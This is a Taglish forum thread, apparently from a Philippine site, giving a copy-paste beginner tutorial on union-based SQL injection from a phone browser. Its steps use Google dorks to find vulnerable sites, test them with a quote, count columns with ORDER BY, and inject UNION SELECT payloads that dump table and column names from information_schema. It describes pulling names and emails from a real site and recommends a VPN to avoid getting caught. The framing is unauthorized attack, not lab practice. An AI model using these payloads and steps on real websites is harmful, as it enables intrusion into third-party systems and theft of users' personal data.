What's new

Closed Matutong mag hàck : di copy pasta beginner tutorial gamit iphone o android

Status
Not open for further replies.
R

remobaview

Forum Veteran
Joined
Feb 9, 2016
Posts
2,084
Reaction
2,817
Points
755
Age
28

Ok! Mga TS Taga Salamat Oras na para matutong Magnakaw ng Credit Card
Biro lang , walang credit card na mawawala ngayon.
Para ito sa mga IT STUDENTS at IT Enthusiast na gusto matuto mag Hàck .
.
Ang I hahàck natin ngayon ay mga WEBSITES the Swagger Style.
.
Ang Tawag Dito ay SQL Injection .
.
Ano ang Sql Injection ? Hindi ko rin alam , nag cocopy paste lang ako sa google para mag ka likes .
Aahahahha .
.
Mahirap ba ito ? Hindi lalo na kung swagger ka , swaggidi swaggeder swag .
.
Mga Kailangan .
.
Android Phone o Iphone .
.
Internet , mas maganda kung naka vpn para di ka mahuli swagger ka panaman .
.
Mga Dapat Tandaan
1 . Google Dorks
2. '
3. order by numberangnakalagaydito--
4. UNION SELECT number,number,number,dependesadamingnumber--
5. group_concat(table_name)
6. from information_schema.tables where table_schema=database()--
7. from information_schema.columns where table_name='exampletable'--
8. from exampletable--
.
Eto ang Step .
.
Step 1 .
Open nyo ang Browser sa phone nyo . Chrome .
.
Step 2 . Mag search ng mga website .
Swagger Question : Lahat ba ng website pwede i hàck ?
.
Swagger Answer : Hindi, mga website lang na may sira sa pagkakagawa.
.
Step 3 . Gumamit ng mga Google Dorks .
example : inurl: paypal.php?id=
.
Step 4. You do not have permission to view the full content of this post. Log in or register now. , buksan ang nakitang website .
.
Step 5. Maglagay ng ' sa dulo ng website . You do not have permission to view the full content of this post. Log in or register now.'
.
Step 6. Kapag may lumabas na error msql,error basta kahit anong swagger na error .
Ibig sabihin pwede i Hàck ang website , tawag dun Vulnerable site.
.
Step 7. gamitin ang Order by tanggaln ang '
ganito: You do not have permission to view the full content of this post. Log in or register now. order by 2--
Maglagay ng number , tapos click enter, pag walang error , taasan ang number .
Hanggang sa magka error .
ganito: You do not have permission to view the full content of this post. Log in or register now. order by 5-
May Error . Bawasan ang number .
ganito: You do not have permission to view the full content of this post. Log in or register now. order by 4-
Walang Error . Ibig sabihin hanggang 4 ang number na kailangan .
.
Step 8. UNION Select .
ganito . You do not have permission to view the full content of this post. Log in or register now. union select 1,2,3,4--
maglagay ng - bago ang number sa ?id
tapos ilagay ang number na walang error . pati mga digits bago nun .
.
Wag mo kalimutan I enter swagger ka panaman.
.
Step 9 . May makikita kang number sa screen mo , iyong 2 at 3 .
. mga table yan na may chicks .
.
Step 10. Pumunta sa url . You do not have permission to view the full content of this post. Log in or register now. union select 1,2,3,4--
palitan ang 2 at 3 ng users() .
ganito : You do not have permission to view the full content of this post. Log in or register now. union select 1,users(),users(),4--
pag may error ok lang proceed to next step .
.
Step 11. group concat(table_name).
You do not have permission to view the full content of this post. Log in or register now. union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--
. Kapag tama ang pagkaka copy paste mo na swagger ka .
. May Lalabas na mga Information . Tawag dun mga Tables .
. explanation .
"Kinuha natin ang mga Table name at pinagsamasama(concatenate) mula sa impormasyon sa mga Table sa Database ng Website . "
Oh diba, swaggedi swaggeder swag!
. Lalabas ang mga Table ng Database ng Website .

Step 12. Alam na natin ang mga Table, alamin naman natin mga Column Sa Table .
Lima yan mga Swagger .
1 . Website, 2. Database 3. Table , 4 . Column 5. Row
Sa website may database , sa database may mga table iyong nakikkta nyo na parang Excel , sa table , may column, iyong Vertical sa excel , sa column may Row, iyong horizontal sa excel .
Swagger!
.
Ganito : You do not have permission to view the full content of this post. Log in or register now. union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='tblAboutUs'--
pinalitan natin iyong . group_concat(table_name) ng group_concat(column_name)
pinalitan ang information_schema.tables ng information_schema.columns
pinalitan ang table_schema=database()-- ng table_name='tblAboutUs'--
nilagyan natin ang tblAboutUs ng dalawang '
 
Last edited:
Mission vision lang ang sa table tblAboutUs , pag ganito . pumili kayo ng ibang table .
Sa video ginamit natin ang tblContactUs ,
ang syntax ng url ay magiging
.
from information_schema.columns where table_name='tblContactUs'--
.
lalabas ang mga First name , lastname , email , walang password dito dahil blogging o journal website lang ito na walang login database . .
.
pagkatapos nito repeat nyo lang ang step simula step 1 , para pumili ng ibat ibang tables ng website.
 
para sa SQL UNION Base using mobile browser nosebleed tutorial
ito ang reference
http://voice0fblackhat.phc.onl/#forbidden#/2012/01/super-detailed-sql-injection-tutorial.html
 
kaya nyo yan , paulit ulit nyo lang gagawin hanggang sa makakabisado nyo na.
pag na cucurious na kayo , ibig sabihin nakukuha nyo na.
.
 
Status
Not open for further replies.

Similar threads

Popular Tags

account ads ai anime best browser bypass chatgpt course deep web deepweb delfermil30 domain facebook fb for free free get gmail google hack heywazup movies heywazup tutorials hosting how how to in internet link movie paypal premium question sites spotify tools torrent tutorial udemy useful vpn web web hosting website websites with wordpress www your yóutube

About this Thread

  • 44
    Replies
  • 2K
    Views
  • 26
    Participants
Last reply from:
Heytinelyf

New Topics

Popular On This Forum

Online statistics

Members online
1,247
Guests online
5,069
Total visitors
6,316
Back
Top